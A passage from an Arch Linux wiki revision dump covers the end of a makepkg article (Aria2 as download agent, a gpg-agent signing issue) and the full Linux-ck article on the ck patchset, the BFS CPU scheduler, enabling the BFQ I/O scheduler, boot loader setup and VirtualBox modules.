}}<br />
<br />
=== Using Aria2 to download sources ===<br />
<br />
{{Style|{{ic|DLAGENTS}} is generic, section should not prefer one specific downloader}}<br />
<br />
You can use [[Aria2]] instead of curl to download source files, just change the {{ic|DLAGENTS}} variable as follows:<br />
<br />
{{hc|/etc/makepkg.conf|2=<br />
[...]<br />
DLAGENTS=('ftp::/usr/bin/aria2c -UWget -s4 %u -o %o'<br />
'http::/usr/bin/aria2c -UWget -s4 %u -o %o'<br />
'https::/usr/bin/aria2c -UWget -s4 %u -o %o'<br />
'rsync::/usr/bin/rsync -z %u %o'<br />
'scp::/usr/bin/scp -C %u %o')<br />
[...]<br />
}}<br />
<br />
{{Note|Use the {{ic|-UWget}} option to change the user agent to Wget. It may prevent problems when downloading from sites that filters the requests based on the user agent to provide different responses on what the users uses to access the URL. Since Aria2 is a lesser known downloader it may be recognized by the site as a browser instead of a downloader, so changing the user agent to Wget may fix it in most cases}}<br />
<br />
== Troubleshooting ==<br />
<br />
=== Makepkg sometimes fails to sign a package without asking for signature passphrase ===<br />
With [https://www.gnupg.org/faq/whats-new-in-2.1.html gnupg 2.1], gpg-agent no longer has to be started manually and will be started automatically on the first invokation of gpg. <br />
<br />
Thus if you don't manually start gpg-agent, makepkg will start it. <br />
<br />
The problem is that makepkg runs gpg inside a fakeroot, so gpg-agent is also started in that same environment. This leads<br />
to bad behavior.<br />
<br />
The obvious remedy is to manually start the gpg-agent, either on boot or by command, before you run makepkg.<br />
<br />
See [[GnuPG#gpg-agent]] for ways to do this.<br />
<br />
== See also ==<br />
* [https://www.archlinux.org/pacman/makepkg.8.html makepkg(8) Manual Page]<br />
* [https://www.archlinux.org/pacman/makepkg.conf.5.html makepkg.conf(5) Manual Page]<br />
* [https://github.com/pixelb/scripts/blob/master/scripts/gcccpuopt gcccpuopt]: A script to print the GCC CPU-specific options tailored for the current CPU</div>Jakkinhttps://wiki.archlinux.org/index.php?title=Linux-ck&diff=362698Linux-ck2015-02-25T22:27:11Z<p>Jakkin: </p>
<hr />
<div>[[Category:Kernel]]<br />
[[ja:Linux-ck]]<br />
[[ru:Linux-ck]]<br />
[[zh-CN:Linux-ck]]<br />
{{Related articles start}}<br />
{{Related|Linux-ck/Changelog}}<br />
{{Related|Repo-ck}}<br />
{{Related|Modprobed-db}}<br />
{{Related articles end}}<br />
<br />
== General package details ==<br />
<br />
{{AUR|Linux-ck}} is a package available in the [[AUR]] and in the [[Linux-ck#2_._Use_pre-compiled_packages|unofficial linux-ck repo]] that allows users to run a kernel/headers setup patched with Con Kolivas' ck1 patchset, including the Brain Fuck Scheduler (BFS). Many Archers elect to use this package for the BFS' excellent desktop interactivity and responsiveness under any load situation. Additionally, the bfs imparts performance gains beyond interactivity. For example, see: [http://repo-ck.com/bench/cpu_schedulers_compared.pdf CPU_Schedulers_Compared.pdf].<br />
<br />
=== Release cycle ===<br />
<br />
Linux-ck roughly follows the release cycle of the official ARCH kernel. The following are requirements for its release:<br />
<br />
* Upstream code<br />
* CK's Patchset<br />
* BFQ Patchset<br />
* ARCH config/config.x86_64 sets for major version jumps only<br />
<br />
=== Package defaults ===<br />
<br />
There are '''three''' modifications to the config files:<br />
# The options that the ck patchset enable/disable.<br />
# The options that the BFQ patchset need to compile without user interaction.<br />
# Apply [https://github.com/graysky2/kernel_gcc_patch GCC patch] that enables additional CPU optimizations at compile time (these options are not part of the standard linux-ck package and are only available when the user compiles custom options).<br />
<br />
'''All other options are set to the ARCH defaults outlined in the main kernel's config files.''' Users are of course free to modify them! The linux-ck package contains an option to switch on the '''nconfig''' config editor (see section below). For some suggestions, see CK's [http://ck.kolivas.org/patches/bfs/bfs-configuration-faq.txt BFS configuration FAQ].<br />
<br />
=== Long-Term Support (LTS) CK releases ===<br />
<br />
In addition to the linux-ck package, there are the following LTS kernel releases patched with the above patchsets, with the previously mentioned modifications to the config files:<br />
<br />
* {{AUR|linux-lts-ck}} - The current ArchLinux LTS kernel patched with the CK patchset<br />
* {{AUR|linux-lts310-ck}} - The 3.10 LTS kernel patched with the CK patchset<br />
* {{AUR|linux-lts312-ck}} - The 3.12 LTS kernel patched with the CK patchset<br />
<br />
'''These three packages are maintained by clfarron4. Pre-packaged versions will not be found in the unofficial ck repo.'''<br />
<br />
== Installation options ==<br />
<br />
{{Note|As with *any* additional kernel, users will need to manually update their boot loader's config file to make it aware of the new kernel images. For example, users of [[GRUB]] should execute "grub-mkconfig -o /boot/grub/grub.cfg". Syslinux, GRUB-legacy, etc. will need to be modified as well.}}<br />
<br />
Users have two options to get these kernel packages.<br />
<br />
=== 1. Compile the package from source ===<br />
<br />
The [[AUR]] contains entries for both packages mentioned above.<br />
<br />
Users can customize the linux-ck package via tweaks in the PKGBUILD:<br />
<br />
* Optional nconfig for user specific tweaking.<br />
* Option to compile a minimal set of modules via a make localmodconfig.<br />
* Option to bypass the standard ARCH config options and simply use the current kernel's .config file.<br />
* Optionally set the [http://algo.ing.unimo.it/people/paolo/disk_sched/ BFQ I/O scheduler] as default.<br />
<br />
More details about these options are provided in the PKGBUILD itself via line comments. Be sure to read them if compiling from the AUR!<br />
<br />
{{Note|There are related PKGBUILDs in the AUR for other common modules unique to linux-ck. For example {{AUR|nvidia-ck}}, {{AUR|nvidia-304xx-ck}},{{AUR|nvidia-340xx-ck}}, and {{AUR|broadcom-wl-ck}} to name a few.}}<br />
<br />
===2 . Use pre-compiled packages ===<br />
<br />
If users would rather not spend the time to compile on their own, an unofficial repo maintained by [[User:Graysky|graysky]] is available to the community.<br />
<br />
For details, see: [[Repo-ck]].<br />
<br />
There are also unofficial repositories for the aforementioned LTS branches, available at [[Unofficial user repositories#linux-lts-ck|linux-lts-ck]] and [[Unofficial user repositories#linux-lts31x-ck|linux-lts31x-ck]], maintained by [[User:clfarron4|clfarron4]].<br />
<br />
== How to enable the BFQ I/O Scheduler ==<br />
{{Note|Do not confuse BFS (Brain Fuck Scheduler) with BFQ (Budget Fair Scheduler). The BFS is a CPU scheduler and is enabled by default whereas BFQ is an I/O scheduler and must implicitly be enabled in order to use it.}}<br />
<br />
Budget Fair Queueing is a disk scheduler which allows each process/thread to be assigned a portion of the disk throughput. Its creator has released some [http://www.youtube.com/watch?v=KhZl9LjCKuU benchmarks] which shows some pretty amazing latency performance.<br />
<br />
Since linux-ck-3.0.4-2, the BFQ patchset is applied to the package by default, but the scheduler must be enabled manually. Users have several options to do so.<br />
<br />
=== Enable BFQ for all devices ===<br />
<br />
If compiling from the AUR, simply set the BFQ flag to "y" in the PKGBUILD prior to building<br />
_BFQ_enable_="y"<br />
<br />
Users of [[repo-ck]] or those who have not modified the PKGBUILD prior to building may appened {{ic|1=elevator=bfq}} to the [[kernel parameters]].<br />
<br />
=== Enable BFQ for only specified devices ===<br />
<br />
An alternative method is to direct the kernel to use BFQ on a device-by-device basis. For example, to enable it for {{ic|/dev/sda}} simply:<br />
# echo bfq > /sys/block/sda/queue/scheduler<br />
<br />
To confirm:<br />
# cat /sys/block/sda/queue/scheduler<br />
noop deadline cfq [bfq] <br />
<br />
Note that doing it this way will not survive a reboot. To make the change automatically at the next system boot, create the following tmpfile where sdX is the desired device:<br />
{{hc|/etc/tmpfiles.d/set_IO_scheduler.conf|<br />
w /sys/block/sdX/queue/scheduler - - - - bfq}}<br />
<br />
== Troubleshooting ==<br />
<br />
=== Boot loader and Linux-ck ===<br />
The boot loader configuration needs to find the (new) kernel images.<br />
For GRUB, see [[GRUB#Generate the main configuration file]]. For other boot loaders it may be necessary to add a custom entry.<br />
<br />
This is an example if adding a custom entry if using [[REFInd#Custom_Menu_Entries|REFInd]]:<br />
{{hc|refind.conf|<nowiki><br />
menuentry Linux {<br />
icon EFI/refind/icons/os_linux.png<br />
ostype Linux<br />
volume boot<br />
loader /vmlinuz-linux-ck<br />
initrd /initramfs-linux-ck.img<br />
options "root=/dev/mapper/root elevator=bfq"<br />
}<br />
</nowiki>}}<br />
<br />
=== Running VirtualBox with Linux-ck ===<br />
<br />
VirtualBox works just fine with custom kernels such as Linux-ck ''without'' the need to keep any of the official ARCH kernel-headers packages on the system!<br />
<br />
Don't forget to add users to the ''vboxusers '' group:<br />
# gpasswd -a USERNAME vboxusers<br />
<br />
==== Option 1. Use the unofficial repo (recommended if linux-ck is installed from Repo-ck) ====<br />
<br />
{{Note|As of 17-Oct-2012, Repo-ck users can enjoy these modules as pre-compiled packages in the repo itself. If you built your linux-ck from the AUR you '''cannot use the repo''' as all packages in the repo are matched groups.}}<br />
<br />
See the [[Repo-ck]] article to set up http://repo-ck.com for pacman to use directly.<br />
<br />
==== Option 2. The virtualbox-ck-host-modules package (recommended if linux-ck is built by you from the AUR) ====<br />
<br />
Install the {{AUR|virtualbox-ck-host-modules}} package and then install '''virtualbox''' package.<br />
<br />
==== Option 3. Use DKMS (more complicated, recommended with LTS releases) ====<br />
<br />
Install '''virtualbox''' with the '''virtualbox-host-dkms''' package. Then setup dkms as follows:<br />
# pacman -S virtualbox virtualbox-host-dkms<br />
# dkms install vboxhost/4.3.12<br />
<br />
{{Note|Make sure to substitute the correct version number of virtualbox in the second command. At the time of writing, 4.3.12 is current.}}<br />
<br />
=== Downgrading ===<br />
<br />
Users wishing to downgrade to a previous version of linux-ck, have several options:<br />
* Source archives are [http://repo-ck.com/bench.htm available] dating back to linux-ck-3.3.7-1. <br />
* [http://pkgbuild.com/git/aur-mirror.git/log/linux-ck AUR.git] holds AUR git commits for linux-ck dating back to linux-ck-2.6.39.3-1.<br />
<br />
=== Forum support ===<br />
<br />
Always feel free to open a thread in the forums for support. Be sure to give the thread a descriptive title to draw attention to the fact that the post relates to the Linux- ck package.<br />
<br />
== A little about the BFS ==<br />
<br />
The Brain Fuck Scheduler is a desktop orientated cpu process scheduler with extremely low latencies for excellent interactivity within normal load levels.<br />
<br />
=== BFS design goals ===<br />
<br />
The BFS has two major design goals:<br />
#Achieve excellent desktop interactivity and responsiveness without heuristics and tuning knobs that are difficult to understand, impossible to model and predict the effect of, and when tuned to one workload cause massive detriment to another.<br />
#Completely do away with the complex designs of the past for the cpu process scheduler and instead implement one that is very simple in basic design.<br />
<br />
For additional information, see the [[linux-ck#Further_Reading_on_BFS_and_CK_Patchset]] section of this article.<br />
<br />
=== An example video about queuing theory ===<br />
<br />
See [http://www.youtube.com/watch?v=F5Ri_HhziI0 this video] about queuing theory for an interesting parallel with<br />
supermarket checkouts. Quote from CK, "the relevance of that video is that BFS uses a single queue, whereas the mainline Linux kernel uses a multiple queue design. The people are tasks, and the checkouts are CPUs. Of course there's a lot more to a CPU scheduler than just the queue design, but I thought this video was very relevant."<br />
<br />
=== Some performance-based metrics: BFS vs. CFS ===<br />
<br />
A major benefit of using the BFS is increased responsiveness. The benefits however, are not limited to desktop feel. [[User:Graysky|Graysky]] put together some non-responsiveness based benchmarks to compare it to the CFS contained in the "stock" linux kernel. Seven different machines were used to see if differences exist and, to what degree they scale using performance based metrics. Again, these end-points were never factors in the primary design goals of the bfs. Results were encouraging. <br />
<br />
For those not wanting to see the full report, here is the conclusion:<br />
Kernels patched with the ck1 patch set including the bfs outperformed the vanilla kernel using the cfs at nearly all the performance-based benchmarks tested. Further study with a larger test set could be conducted, but based on the small test set of 7 PCs evaluated, these increases in process queuing, efficiency/speed are, on the whole, independent of CPU type (mono, dual, quad, hyperthreaded, etc.), CPU architecture (32-bit and 64-bit) and of CPU multiplicity (mono or dual socket).<br />
<br />
Moreover, several "modern" CPUs (Intel C2D and Ci7) that represent common workstations and laptops, consistently outperformed the cfs in the vanilla kernel at all benchmarks. Efficiency and speed gains were small to moderate.<br />
<br />
[[http://repo-ck.com/bench/cpu_schedulers_compared.pdf CPU_Schedulers_Compared.pdf]] is available for download.<br />
<br />
=== Check if enabled ===<br />
<br />
This start-up message should appear in the kernel ring buffer when BFS in enabled:<br />
# dmesg | grep scheduler<br />
...<br />
[ 0.380500] BFS CPU scheduler v0.420 by Con Kolivas.<br />
<br />
== BFS myths==<br />
<br />
=== BFS patched kernels CAN in fact use systemd ===<br />
<br />
It is a common mistake to think that BFS does not support cgroups. It does support cgroups, just not all the cgroup features (e. g. CPU limiting won't work).<br />
<br />
== Further Reading on BFS and CK Patchset ==<br />
<br />
* [http://ck.kolivas.org/patches/bfs/bfs-faq.txt Con Kolivas' White Paper on the BFS]<br />
* [http://en.wikipedia.org/wiki/Brain_Fuck_Scheduler Wikipedia's BFS Article]<br />
* [http://ck-hack.blogspot.com/ Con Kolivas' Blog]</div>Jakkin